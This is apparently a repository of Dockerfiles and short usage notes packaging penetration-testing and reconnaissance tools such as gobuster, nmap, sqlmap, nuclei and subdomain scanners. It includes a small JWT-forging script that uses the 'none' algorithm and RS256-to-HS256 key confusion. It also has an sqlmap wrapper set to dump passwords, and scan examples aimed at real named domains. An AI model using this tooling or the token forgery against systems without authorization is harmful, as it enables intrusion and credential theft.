"python", "/gmapsapiscanner/maps_api_scanner_python3.py" ] -------------------------------------------------------------------------------- /gobuster/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | # Setup gobuster 3 | RUN go get github.com/OJ/gobuster && \ 4 | mv /go/bin/gobuster /bin/gobuster && \ 5 | rm -rf /go 6 | # get content Lists 7 | RUN apt install -y wget && \ 8 | mkdir /seclists && \ 9 | wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/raft-large-directories-lowercase.txt -O /seclists/raft-large-directories-lowercase.txt && \ 10 | wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/big.txt -O /seclists/big.txt && \ 11 | wget https://gist.githubusercontent.com/jhaddix/b80ea67d85c13206125806f0828f4d10/raw/c81a34fe84731430741e0463eb6076129c20c4c0/content_discovery_all.txt -O /seclists/jhaddix.txt 12 | ENTRYPOINT [ "gobuster" ] -------------------------------------------------------------------------------- /gobuster/README.md: -------------------------------------------------------------------------------- 1 | # Parameter 2 | 3 | ``` 4 | docker run -it --rm gobuster -P $password -U $username -u $domain -s 101,102,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,306,307,308,400,401,402,403,404,405,406,407,408,409,410,411,412,413,500,501,502,503,504,505,506,507,508,509,510,511,512 -r --wildcard 5 | 6 | docker run -it --rm gobuster -u https://www.stuttgart-netze.de -s 101,102,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,306,307,308,400,401,402,403,404,405,406,407,408,409,410,411,412,413,500,501,502,503,504,505,506,507,508,509,510,511,512 -r --wildcard 7 | ``` 8 | -------------------------------------------------------------------------------- /gospider/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | # Setup gobuster 3 | RUN go get -u github.com/jaeles-project/gospider 4 | RUN mkdir /data 5 | WORKDIR /data 6 | ENTRYPOINT [ "gospider" ] -------------------------------------------------------------------------------- /hakrawler/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update &&\ 4 | go get github.com/hakluke/hakrawler 5 | 6 | RUN mkdir /data 7 | 8 | WORKDIR /data 9 | 10 | ENTRYPOINT [ "hakrawler" ] -------------------------------------------------------------------------------- /hakrawler/README.md: -------------------------------------------------------------------------------- 1 | ### Arguments 2 | 3 | ``` 4 | -depth 3 5 | -doamin htwg-konstanz.de 6 | ``` 7 | -------------------------------------------------------------------------------- /hashid/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | pip install hashid 5 | 6 | ENTRYPOINT [ "hashid" ] -------------------------------------------------------------------------------- /hashid/README.md: -------------------------------------------------------------------------------- 1 | ## Hashid 2 | 3 | `docker run -it --rm hashid "ACNJPIDVNPDIBVIV"` -------------------------------------------------------------------------------- /httprobe/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update &&\ 4 | go get -u github.com/tomnomnom/httprobe 5 | 6 | ENTRYPOINT [ "httprobe" ] -------------------------------------------------------------------------------- /ip_info/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update 4 | 5 | RUN pip install requests 6 | 7 | RUN mkdir /source 8 | WORKDIR /source 9 | 10 | ENTRYPOINT [ "python", "/source/ip_info.py" ] -------------------------------------------------------------------------------- /ip_info/README.md: -------------------------------------------------------------------------------- 1 | ## Usage dev 2 | 3 | ``` 4 | docker build . -t ip_info 5 | docker run --rm -v "$(pwd):/source" ip_info 1.1.1.1 6 | ``` 7 | 8 | ## Usage prod 9 | 10 | ``` 11 | docker pull 12 | docker run 13 | ``` 14 | 15 | ## ToDo 16 | 17 | * Multiple IPs ( Api Limit is 100 at once ) 18 | * Dockerfile for production should clone from git -------------------------------------------------------------------------------- /ip_info/ip_info.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import pprint 4 | 5 | def main(): 6 | if len(sys.argv) < 2: 7 | print("[!] no IP supplied") 8 | sys.exit(1) 9 | ip = sys.argv[1] 10 | api_url = f"http://ip-api.com/json/{ip}" 11 | resp = requests.get(api_url) 12 | pp = pprint.PrettyPrinter(indent=4) 13 | if resp.status_code is not 200: 14 | print("[!] Error while retrieving data from API") 15 | sys.exit(1) 16 | else: 17 | pp.pprint(resp.json()) 18 | 19 | if __name__ == "__main__": 20 | main() -------------------------------------------------------------------------------- /jwt/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | 4 | RUN apt update 5 | 6 | RUN mkdir source 7 | 8 | RUN pip install pyjwt==0.4.3 9 | 10 | WORKDIR /source 11 | -------------------------------------------------------------------------------- /jwt/README.md: -------------------------------------------------------------------------------- 1 | ### Usage 2 | 3 | `docker build . -t jwt` 4 | 5 | `docker run -it --rm -v "$(pwd):/source" jwt bash` 6 | 7 | Execute 8 | 9 | `python token.py key.pem $token` 10 | -------------------------------------------------------------------------------- /jwt/key.test: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyTKa6m5GFOllz7oIHFCk 3 | vRJoBv7wLMuKIPLHbFGh5yOiO8o3akoqMhf1x6MxINGhZo6dkIrhVlVfWJhEJZPV 4 | aQdvyvVmlIZruhcbz3PGMqPAbjq2JqbB1mMnsyGHx+ovP0Cm5xj8sgI8wm67p3no 5 | sqzqFvg6mPKVO+w1QBr5seDU2AwU2DR88LF2v03Zjgn4mGvPdUOXihTQoNlf+nJF 6 | duXMDyRgZabnR2HlYHhagHwy1beWW1WtEaPz8iBN/0bGkGw705aDBUHJkdTty1mz 7 | sCZRur/n0imqXu9IzoSyiq5d0yKrRA5xkA+K3DMeRMquZ5QvPT9Eee4EZfFL97zB 8 | fQIDAQAB 9 | -----END PUBLIC KEY----- 10 | -------------------------------------------------------------------------------- /jwt/token.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | import jwt 4 | import sys 5 | 6 | def none_algo(token): 7 | decodedToken = jwt.decode(token, verify=False) 8 | print(f"Decoded Token:\n {decodedToken}") 9 | noneEncoded = jwt.encode(decodedToken, key='', algorithm=None) 10 | print(f"Token with None Algorithm:\n{jwt.decode(noneEncoded, verify=False)}") 11 | print(f"Copy none token:\n{noneEncoded}") 12 | 13 | 14 | def rs256_to_hs256(key_path,token): 15 | public = open(key_path, 'r').read() 16 | decodedToken = jwt.decode(token, verify=False) 17 | newToken = jwt.encode(decodedToken, key=public, algorithm='HS256') 18 | print(f"Copy Token: {newToken.decode()}") 19 | 20 | 21 | #key_path = sys.argv[1] 22 | token = sys.argv[1] 23 | #rs256_to_hs256(key_path, token) 24 | none_algo(token) 25 | -------------------------------------------------------------------------------- /katana/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | apt install git -y 5 | 6 | RUN git clone https://github.com/adnane-X-tebbaa/Katana.git &&\ 7 | cd Katana &&\ 8 | python3 -m pip install -r requirements.txt 9 | 10 | ENTRYPOINT [ "python", "/Katana/kds.py"] -------------------------------------------------------------------------------- /kiterunner/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update 4 | 5 | RUN git clone https://github.com/assetnote/kiterunner.git 6 | 7 | RUN cd kiterunner &&\ 8 | make build &&\ 9 | ln -s $(pwd)/dist/kr /usr/local/bin/kr 10 | RUN mkdir /work 11 | RUN mkdir /execution 12 | ADD https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz /work/routes-large.kite.tar.gz 13 | 14 | RUN cd /work && tar -xvzf routes-large.kite.tar.gz && rm -rf routes-large.kite.tar.gz 15 | #RUN ls -lah /work 16 | WORKDIR /execution 17 | ENTRYPOINT [ "kr" ] -------------------------------------------------------------------------------- /kiterunner/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ``` 4 | docker run -it --rm kiterunner scan test.com -w /work/routes-large.kite -x 20 -j 5 5 | ``` -------------------------------------------------------------------------------- /knockpy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:2.7 2 | # Add Virustotal API Key 3 | RUN apt update && \ 4 | apt install -y \ 5 | git \ 6 | python-dnspython \ 7 | wget 8 | 9 | RUN git clone https://github.com/guelfoweb/knock.git 10 | 11 | WORKDIR /knock 12 | 13 | RUN python setup.py install 14 | 15 | RUN wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-110000.txt -O /wordlist.txt 16 | 17 | RUN echo "nameserver 8.8.8.8" > /etc/resolv.conf 18 | 19 | ENTRYPOINT ["python", "/knock/knockpy/knockpy.py"] -------------------------------------------------------------------------------- /knockpy/README.md: -------------------------------------------------------------------------------- 1 | ## Usage dev 2 | 3 | ``` 4 | docker build . -t knockpy 5 | docker run --rm knockpy -w /wordlist.txt 6 | ``` -------------------------------------------------------------------------------- /linkfinder/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | apt install git -y &&\ 5 | git clone https://github.com/GerbenJavado/LinkFinder.git &&\ 6 | cd LinkFinder &&\ 7 | python setup.py install 8 | 9 | RUN mkdir /data 10 | WORKDIR /data 11 | ENTRYPOINT [ "python", "/LinkFinder/linkfinder.py" ] -------------------------------------------------------------------------------- /linkfinder/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | `docker run -it --rm -v "$(pwd):/data" linkfinder` 6 | 7 | 8 | -------------------------------------------------------------------------------- /masscan/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:latest 2 | 3 | RUN apt update &&\ 4 | apt-get install git gcc make libpcap-dev -y &&\ 5 | git clone https://github.com/robertdavidgraham/masscan &&\ 6 | cd masscan &&\ 7 | make -j 4 8 | 9 | ENTRYPOINT [ "/masscan/bin/masscan" ] -------------------------------------------------------------------------------- /massscan/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM buildpack-deps:stretch-scm as build 2 | ENV DEBIAN_FRONTEND noninteractive 3 | RUN apt-get update && \ 4 | apt-get install -y \ 5 | build-essential \ 6 | clang \ 7 | libpcap-dev 8 | COPY . /masscan/ 9 | WORKDIR /masscan 10 | RUN make -j 11 | 12 | FROM debian:stretch-slim 13 | RUN apt-get update && \ 14 | DEBIAN_FRONTEND=noninteractive apt-get install -y libpcap0.8 && \ 15 | rm -rf /tmp/* /var/tmp/* /var/lib/apt/lists/* /var/cache/apt/archives/* 16 | COPY --from=build /masscan/bin/masscan /usr/local/bin/ 17 | ENTRYPOINT ["/usr/local/bin/masscan"] -------------------------------------------------------------------------------- /meg/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update &&\ 4 | go get -u github.com/tomnomnom/meg 5 | 6 | ENTRYPOINT [ "meg" ] -------------------------------------------------------------------------------- /metagoofil/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:latest 2 | 3 | RUN apt update 4 | RUN apt install python3 git python-pip -y 5 | RUN pip install requests 6 | RUN git clone https://github.com/laramies/metagoofil.git 7 | 8 | #ENTRYPOINT [ "python", "metagoofil/metagoofil.py" ] 9 | 10 | # metagoofile ausführen, cat des Bericht zurück geben. -------------------------------------------------------------------------------- /nikto/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM kalilinux/kali-linux-docker:latest 2 | 3 | RUN apt update &&\ 4 | apt install nikto -y 5 | 6 | ENTRYPOINT [ "nikto" ] -------------------------------------------------------------------------------- /nmap/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM kalilinux/kali-linux-docker 2 | 3 | RUN apt update && \ 4 | apt install -y \ 5 | nmap 6 | 7 | #ENTRYPOINT [ "nmap" ] -------------------------------------------------------------------------------- /nmap/README.md: -------------------------------------------------------------------------------- 1 | ## Notes 2 | 3 | Use dos2unix to get rid of windows cariage return values. -------------------------------------------------------------------------------- /nmap_debian/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:latest 2 | 3 | RUN apt update &&\ 4 | apt install nmap -y 5 | 6 | ENTRYPOINT [ "nmap" ] -------------------------------------------------------------------------------- /nmap_searchsploit/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM kalilinux/kali-linux-docker 2 | 3 | RUN apt update && \ 4 | apt install -y \ 5 | exploitdb \ 6 | exploitdb-bin-sploits \ 7 | openvpn \ 8 | nmap \ 9 | dos2unix 10 | 11 | 12 | 13 | RUN mkdir /root/data 14 | WORKDIR /root/data -------------------------------------------------------------------------------- /nmap_searchsploit/README.md: -------------------------------------------------------------------------------- 1 | ## Notes 2 | 3 | Use dos2unix to get rid of windows cariage return values. -------------------------------------------------------------------------------- /nmap_searchsploit/scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ip=$1 3 | echo $ip 4 | nmap -oX output/tmp.xml -sV $1 5 | searchsploit --nmap "output/tmp.xml" > tmp.txt 6 | cat tmp.txt | grep /usr/bin/searchsploit >> "$1_out.txt" 7 | cat tmp.txt | grep exploits >> "$1_out.txt" -------------------------------------------------------------------------------- /ntlmscan/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | apt install git wget -y &&\ 5 | pip install requests &&\ 6 | git clone https://github.com/nyxgeek/ntlmscan.git 7 | 8 | ENTRYPOINT [ "python", "ntlmscan/ntlmscan.py" ] -------------------------------------------------------------------------------- /ntlmscan/Readme.md: -------------------------------------------------------------------------------- 1 | https://github.com/nyxgeek/ntlmscan.git 2 | 3 | `docker run -it --rm ntlmscan --help ` -------------------------------------------------------------------------------- /nuclei/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update &&\ 4 | apt install git -y 5 | 6 | RUN git clone https://github.com/projectdiscovery/nuclei.git 7 | 8 | RUN cd nuclei/v2/cmd/nuclei/ &&\ 9 | go build . &&\ 10 | mv nuclei /usr/local/bin/ 11 | 12 | RUN git clone https://github.com/projectdiscovery/nuclei-templates.git /templates 13 | 14 | RUN mkdir /data 15 | 16 | WORKDIR /data 17 | 18 | ENTRYPOINT [ "nuclei" ] 19 | -------------------------------------------------------------------------------- /nuclei/README.md: -------------------------------------------------------------------------------- 1 | ## Usage 2 | 3 | ``` 4 | 5 | docker run -it --rm -v $(pwd):/data nuclei -l $url_input -t /templates/cves/CVE-2020-9484.yaml -c 12 6 | 7 | docker run -it --rm -v $(pwd):/data nuclei -target $url -t /templates/ -c 12 8 | ``` 9 | 10 | ## Manual 11 | 12 | ``` 13 | Usage of nuclei: 14 | -H value 15 | Custom Header. 16 | -c int 17 | Number of concurrent requests to make (default 10) 18 | -debug 19 | Allow debugging of request/responses 20 | -json 21 | Write json output to files 22 | -l string 23 | List of URLs to run templates on 24 | -nC 25 | Don't Use colors in output 26 | -o string 27 | File to write output to (optional) 28 | -proxy-socks-url string 29 | URL of the proxy socks server 30 | -proxy-url string 31 | URL of the proxy server 32 | -retries int 33 | Number of times to retry a failed request (default 1) 34 | -silent 35 | Show only results in output 36 | -t value 37 | Template input file/files to run on host. Can be used multiple times. 38 | -target string 39 | Target is a single target to scan using template 40 | -timeout int 41 | Time to wait in seconds before timeout (default 5) 42 | -update-directory string 43 | Directory to use for storing nuclei-templates 44 | -update-templates 45 | Update Templates updates the installed templates (optional) 46 | -v Show Verbose output 47 | -version 48 | Show version of nuclei 49 | ``` -------------------------------------------------------------------------------- /osmedeus/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update 4 | RUN apt install git -y 5 | RUN git clone https://github.com/j3ssie/Osmedeus && cd Osmedeus && ./install.sh 6 | WORKDIR /Osmedeus 7 | ENTRYPOINT [ "python", "osmedeus.py" ] -------------------------------------------------------------------------------- /parameth/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:2.7 2 | # Add Virustotal API Key 3 | RUN apt update && \ 4 | apt install -y \ 5 | git 6 | 7 | RUN git clone https://github.com/maK-/parameth.git 8 | 9 | WORKDIR /parameth 10 | 11 | RUN pip install -r requirements.txt 12 | 13 | RUN echo "nameserver 8.8.8.8" > /etc/resolv.conf 14 | 15 | ENTRYPOINT ["python", "/parameth/parameth.py"] -------------------------------------------------------------------------------- /paramspider/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | git clone https://github.com/devanshbatham/ParamSpider &&\ 5 | cd ParamSpider &&\ 6 | pip3 install -r requirements.txt 7 | 8 | WORKDIR /ParamSpider 9 | 10 | ENTRYPOINT [ "python", "paramspider.py" ] -------------------------------------------------------------------------------- /paramspider/README.md: -------------------------------------------------------------------------------- 1 | ## Paramspider 2 | 3 | [Source](https://github.com/devanshbatham/ParamSpider) 4 | 5 | `docker run -it --rm paramspider --domain $domain` 6 | 7 | ## Usage 8 | 9 | 10 | 11 | ``` 12 | 1 - For a simple scan [without the --exclude parameter] 13 | $ python3 paramspider.py --domain hackerone.com 14 | -> Output ex : https://hackerone.com/test.php?q=FUZZ 15 | 16 | 2 - For excluding urls with specific extensions 17 | $ python3 paramspider.py --domain hackerone.com --exclude php,jpg,svg 18 | 19 | 3 - For finding nested parameters 20 | $ python3 paramspider.py --domain hackerone.com --level high 21 | -> Output ex : https://hackerone.com/test.php?p=test&q=FUZZ 22 | 23 | 4 - Saving the results 24 | $ python3 paramspider.py --domain hackerone.com --exclude php,jpg --output hackerone.txt 25 | 26 | 5 - Using with a custom placeholder text (default is FUZZ), e.g. don't add a placeholder 27 | $ python3 paramspider.py --domain hackerone.com --placeholder FUZZ2 28 | 29 | 6 - Using the quiet mode (without printing the URLs on screen) 30 | $ python3 paramspider.py --domain hackerone.com --quiet 31 | 32 | 7 - Exclude subdomains [for parameters from domain+subdomains, do not specify this argument] 33 | $ python3 paramspider.py --domain hackerone.com --subs False 34 | ``` -------------------------------------------------------------------------------- /pdftotext/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:latest 2 | 3 | RUN apt update &&\ 4 | apt install poppler-utils -y &&\ 5 | mkdir /data 6 | 7 | WORKDIR /data 8 | 9 | ENTRYPOINT [ "pdftotext" ] -------------------------------------------------------------------------------- /pdftotext/README.md: -------------------------------------------------------------------------------- 1 | ## Usage 2 | 3 | 4 | ``` 5 | docker build . -t pdf2txt 6 | 7 | docker run -it --rm -v "$(pwd):/data" pdf2txt 8 | ``` -------------------------------------------------------------------------------- /photon/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | apt install git -y &&\ 5 | git clone https://github.com/s0md3v/Photon.git &&\ 6 | cd Photon &&\ 7 | pip3 install -r requirements.txt 8 | 9 | WORKDIR /Photon 10 | 11 | ENTRYPOINT [ "python", "photon.py" ] -------------------------------------------------------------------------------- /photon/README.md: -------------------------------------------------------------------------------- 1 | `docker run -it -v "$(pwd):/root" --rm photon -u www.stadtwerke-stuttgart.de -t 16 -o /root/photon` 2 | -------------------------------------------------------------------------------- /sherlock/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | # Add Virustotal API Key 3 | RUN apt update && \ 4 | apt install -y \ 5 | git 6 | 7 | RUN git clone https://github.com/sherlock-project/sherlock.git 8 | 9 | WORKDIR /sherlock 10 | 11 | RUN pip install -r requirements.txt 12 | 13 | RUN echo "nameserver 8.8.8.8" > /etc/resolv.conf 14 | 15 | ENTRYPOINT ["python", "sherlock.py"] -------------------------------------------------------------------------------- /shodan_info/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | pip install requests &&\ 5 | pip install shodan &&\ 6 | echo "nameserver 8.8.8.8" > /etc/resolv.conf &&\ 7 | echo "run='clear && python /source/shodan_info.py'" >> ~/.bashrc 8 | 9 | RUN mkdir /source 10 | WORKDIR /source 11 | 12 | ENTRYPOINT [ "python", "/source/shodan_info.py" ] -------------------------------------------------------------------------------- /shodan_info/shodan_info.py: -------------------------------------------------------------------------------- 1 | import shodan 2 | import sys 3 | import os 4 | import pprint 5 | 6 | def read_file(file_name): 7 | """Reads the content of a file and yields every line. 8 | 9 | Arguments: 10 | file_name {str} -- The name of the File to read. 11 | """ 12 | with open(file_name) as file_to_read: 13 | for line in file_to_read: 14 | yield line 15 | 16 | def shodan_info(): 17 | """ 18 | Retrieves api key from shodan.key file and 19 | reads IP from sys.argv and makes API call to get shodan information. 20 | Shodan 'ip' parameter is used to query shodan. 21 | """ 22 | if len(sys.argv) < 2: 23 | print("[!] no IP supplied") 24 | sys.exit(1) 25 | ip = sys.argv[1] 26 | shodan_api_key = [line for line in read_file("shodan.key")][0] 27 | api = shodan.Shodan(shodan_api_key) 28 | pp = pprint.PrettyPrinter(indent=4) 29 | try: 30 | results = api.search(f"ip:{ip}") 31 | print('Results found: {}'.format(results['total'])) 32 | pp.pprint(results) 33 | except shodan.APIError as e: 34 | print('Error: {}'.format(e)) 35 | 36 | 37 | if __name__ == "__main__": 38 | shodan_info() -------------------------------------------------------------------------------- /smuggler/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | 4 | RUN apt update &&\ 5 | apt install git -y &&\ 6 | git clone https://github.com/defparam/smuggler.git 7 | 8 | 9 | ENTRYPOINT [ "python", "/smuggler/smuggler.py" ] 10 | -------------------------------------------------------------------------------- /smuggler/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | https://github.com/defparam/smuggler -------------------------------------------------------------------------------- /smuggler2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | 4 | RUN apt update &&\ 5 | apt install git -y &&\ 6 | pip install requests fake_useragent &&\ 7 | git clone https://github.com/Lactea98/smuggler.py.git 8 | 9 | 10 | ENTRYPOINT [ "python", "/smuggler.py/smuggler.py" ] 11 | -------------------------------------------------------------------------------- /smuggler2/README.md: -------------------------------------------------------------------------------- 1 | https://github.com/Lactea98/smuggler.py -------------------------------------------------------------------------------- /sqlmap/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | apt install git -y &&\ 5 | git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap 6 | RUN mkdir /data 7 | WORKDIR /sqlmap 8 | ENTRYPOINT [ "python", "sqlmap.py" ] 9 | -------------------------------------------------------------------------------- /sqlmap_module/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | apt install git -y &&\ 5 | git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap 6 | 7 | WORKDIR /sqlmap 8 | 9 | RUN printf '\ 10 | python sqlmap.py --batch --level=5 --risk=3 --passwords $@\n\ 11 | ' > wrapper.sh && chmod +x wrapper.sh 12 | 13 | RUN cat wrapper.sh 14 | 15 | ENTRYPOINT ["bash","./wrapper.sh"] 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /sqlmap_module/README.md: -------------------------------------------------------------------------------- 1 | ## SQLMap 2 | 3 | Default set Parameter 4 | 5 | ``` 6 | --batch never ask for UserInput 7 | --level=5 8 | --risk=3 9 | --passwords 10 | ``` 11 | 12 | --- 13 | 14 | ``` 15 | --u URL 16 | -v VERBOSE Verbosity level: 0-6 (default 1) 17 | ``` 18 | -------------------------------------------------------------------------------- /sqlmap_module/config.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "sqlmap_aggressive" 3 | } 4 | -------------------------------------------------------------------------------- /sslyze/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | pip install --upgrade setuptools &&\ 5 | pip install --upgrade sslyze 6 | 7 | ENTRYPOINT [ "sslyze" ] -------------------------------------------------------------------------------- /subjack/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update &&\ 4 | go get -u github.com/haccer/subjack 5 | 6 | ENTRYPOINT [ "subjack" ] -------------------------------------------------------------------------------- /subjack/README.md: -------------------------------------------------------------------------------- 1 | ## Subjack 2 | 3 | Tool to check list of URLs for Subdomain Takeovers. 4 | 5 | ``` 6 | Examples: 7 | 8 | ./subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl 9 | Options: 10 | 11 | -w domains.txt is your list of subdomains. 12 | -t is the number of threads (Default: 10 threads). 13 | -timeout is the seconds to wait before timeout connection (Default: 10 seconds). 14 | -o results.txt where to save results to. For JSON: -o results.json 15 | -ssl enforces HTTPS requests which may return a different set of results and increase accuracy. 16 | -a skips CNAME check and sends requests to every URL. (Recommended) 17 | -m flag the presence of a dead record, but valid CNAME entry. 18 | -v verbose. Display more information per each request. 19 | -c Path to configuration file. 20 | 21 | ``` -------------------------------------------------------------------------------- /sublist3r/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt-get update 4 | RUN apt-get install -y \ 5 | python-requests \ 6 | python-dnspython \ 7 | git && \ 8 | git clone https://github.com/aboul3la/Sublist3r.git sublister 9 | 10 | 11 | RUN mkdir /data 12 | WORKDIR /data 13 | 14 | 15 | RUN cd /sublister && pip install -r ./requirements.txt 16 | 17 | ENTRYPOINT ["/usr/bin/python", "/sublister/sublist3r.py"] -------------------------------------------------------------------------------- /sublist3r/README.md: -------------------------------------------------------------------------------- 1 | ## Output to file 2 | 3 | `docker run -it --rm -v "$(pwd):/data" sublister -o $filename -d $domain` -------------------------------------------------------------------------------- /subscraper/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | apt install -y git &&\ 5 | git clone https://github.com/m8r0wn/subscraper.git &&\ 6 | cd subscraper &&\ 7 | python setup.py install &&\ 8 | mkdir /data 9 | 10 | WORKDIR /data 11 | 12 | ENTRYPOINT [ "python", "/subscraper/subscraper.py" ] -------------------------------------------------------------------------------- /subscraper/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | `docker run -it subscraper swisscom.com` 4 | 5 | `docker run -v "$(pwd):/data" -it subscraper swisscom.com ` 6 | 7 | -------------------------------------------------------------------------------- /test-module/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:latest 2 | 3 | RUN apt update &&\ 4 | mkdir script 5 | 6 | WORKDIR /script 7 | 8 | RUN echo "while true;do date && sleep 5;done" > main.sh && chmod +x main.sh 9 | 10 | RUN rm -rf /etc/localtime &&\ 11 | ln -s /usr/share/zoneinfo/Europe/Berlin /etc/localtime 12 | 13 | ENTRYPOINT [ "bash", "./main.sh" ] -------------------------------------------------------------------------------- /theharvester/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.6-alpine3.7 2 | 3 | RUN apk update &&\ 4 | apk add --no-cache git build-base &&\ 5 | git clone https://github.com/laramies/theHarvester.git 6 | WORKDIR /theHarvester 7 | RUN pip3 install --no-cache-dir -r requirements.txt &&\ 8 | chmod +x *.py 9 | #Add API keys 10 | ARG shodan_key=1234 11 | 12 | #ENTRYPOINT ["/usr/local/bin/python","/theHarvester/theHarvester.py"] -------------------------------------------------------------------------------- /tomnomnom-gf/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update &&\ 4 | apt install git -y &&\ 5 | go get -u github.com/tomnomnom/gf &&\ 6 | echo 'source $GOPATH/src/github.com/tomnomnom/gf/gf-completion.bash' >> ~/.bashrc &&\ 7 | cp -r $GOPATH/src/github.com/tomnomnom/gf/examples ~/.gf 8 | 9 | RUN git clone https://github.com/1ndianl33t/Gf-Patterns /Gf-Patterns &&\ 10 | cp /Gf-Patterns/*.json ~/.gf 11 | 12 | 13 | RUN mkdir /data 14 | 15 | WORKDIR /data 16 | 17 | ENTRYPOINT [ "gf" ] -------------------------------------------------------------------------------- /tomnomnom-gf/README.md: -------------------------------------------------------------------------------- 1 | ## Usage 2 | 3 | 4 | 5 | `docker build . -t gf` 6 | 7 | 8 | `docker run -it --rm -v "$(pwd):/data" gf` 9 | 10 | 11 | `docker run -it --rm -v "$(pwd):/data" gf ssrf /data/allurls.txt` -------------------------------------------------------------------------------- /url_extractor_module/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ruby:latest 2 | 3 | RUN apt update &&\ 4 | apt install git -y &&\ 5 | git clone https://github.com/jobertabma/relative-url-extractor.git 6 | 7 | WORKDIR /relative-url-extractor 8 | 9 | ENTRYPOINT [ "ruby", "extract.rb" ] -------------------------------------------------------------------------------- /urlprobe/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update &&\ 4 | go get -u github.com/1ndianl33t/urlprobe 5 | 6 | 7 | ENTRYPOINT [ "urlprobe" ] 8 | -------------------------------------------------------------------------------- /urlprobe/README.md: -------------------------------------------------------------------------------- 1 | ## Usage 2 | 3 | 4 | `docker build . -t urlprobe` 5 | 6 | 7 | `docker run -it --rm urlprobe` -------------------------------------------------------------------------------- /viewstate-generator/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | 4 | RUN apt update &&\ 5 | apt install git -y &&\ 6 | git clone https://github.com/0xacb/viewgen.git &&\ 7 | cd viewgen && pip3 install --upgrade -r requirements.txt 8 | 9 | ENTRYPOINT [ "python", "/viewgen/viewgen" ] -------------------------------------------------------------------------------- /viewstate-generator/README.md: -------------------------------------------------------------------------------- 1 | ## Usage 2 | 3 | 4 | `docker build . -t viewgen` 5 | 6 | `docker run -it --rm viewgen` -------------------------------------------------------------------------------- /waybackurl/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update &&\ 4 | go get github.com/tomnomnom/waybackurls 5 | 6 | ENTRYPOINT [ "waybackurls" ] 